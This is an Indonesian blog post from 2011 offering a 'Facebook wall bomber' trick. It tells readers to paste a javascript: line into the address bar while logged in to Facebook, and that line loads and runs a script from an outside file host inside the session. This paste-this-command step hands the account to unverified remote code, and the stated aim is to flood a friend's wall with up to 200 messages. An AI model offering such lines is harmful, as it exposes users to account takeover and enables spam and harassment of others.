Kamis, 23 Juni 2011

Trik Facebook Wall Boomber

Trik Facebook Wall Boomber - mendengar namanya saja sudah unik, itu apaan sih ?? maksudnya adalah kita bisa langsung mengirimkan pesan ke Wall temen kita sebanyak 200 dengan hanya 2 kali klik. mudah bukan ?
Oh ya sekedar peringatan aja. Jangan Terlalu sering menggunakan Trik ini karena anda bisa dianggap spam oleh 
facebook dan ujung ujungnya bisa diblokir. tapi kalo nyoba sekali skali masih aman kok. langsung aja :


  1. Login Ke Facebook
  2. Pergi ke Wall temen kamu
  3. Hapus semua Url yang ada pada browse kamu, lalu pastekan kode berikut langsung tekan Enter.

javascript:(a = (b = document).createElement("script")).src = "http://spsc66.fileave.com/boomber.js", b.body.appendChild(a); void(0);

lalu akan muncul kotak untuk Memasukkan Jumlah Pesan yang anda ingin kirim
Selanjutnya Tulis pesan yang ingin anda kirim. Selesai deh. demikian 
Trik Facebook Wall Boomber

Tidak ada komentar:

Poskan Komentar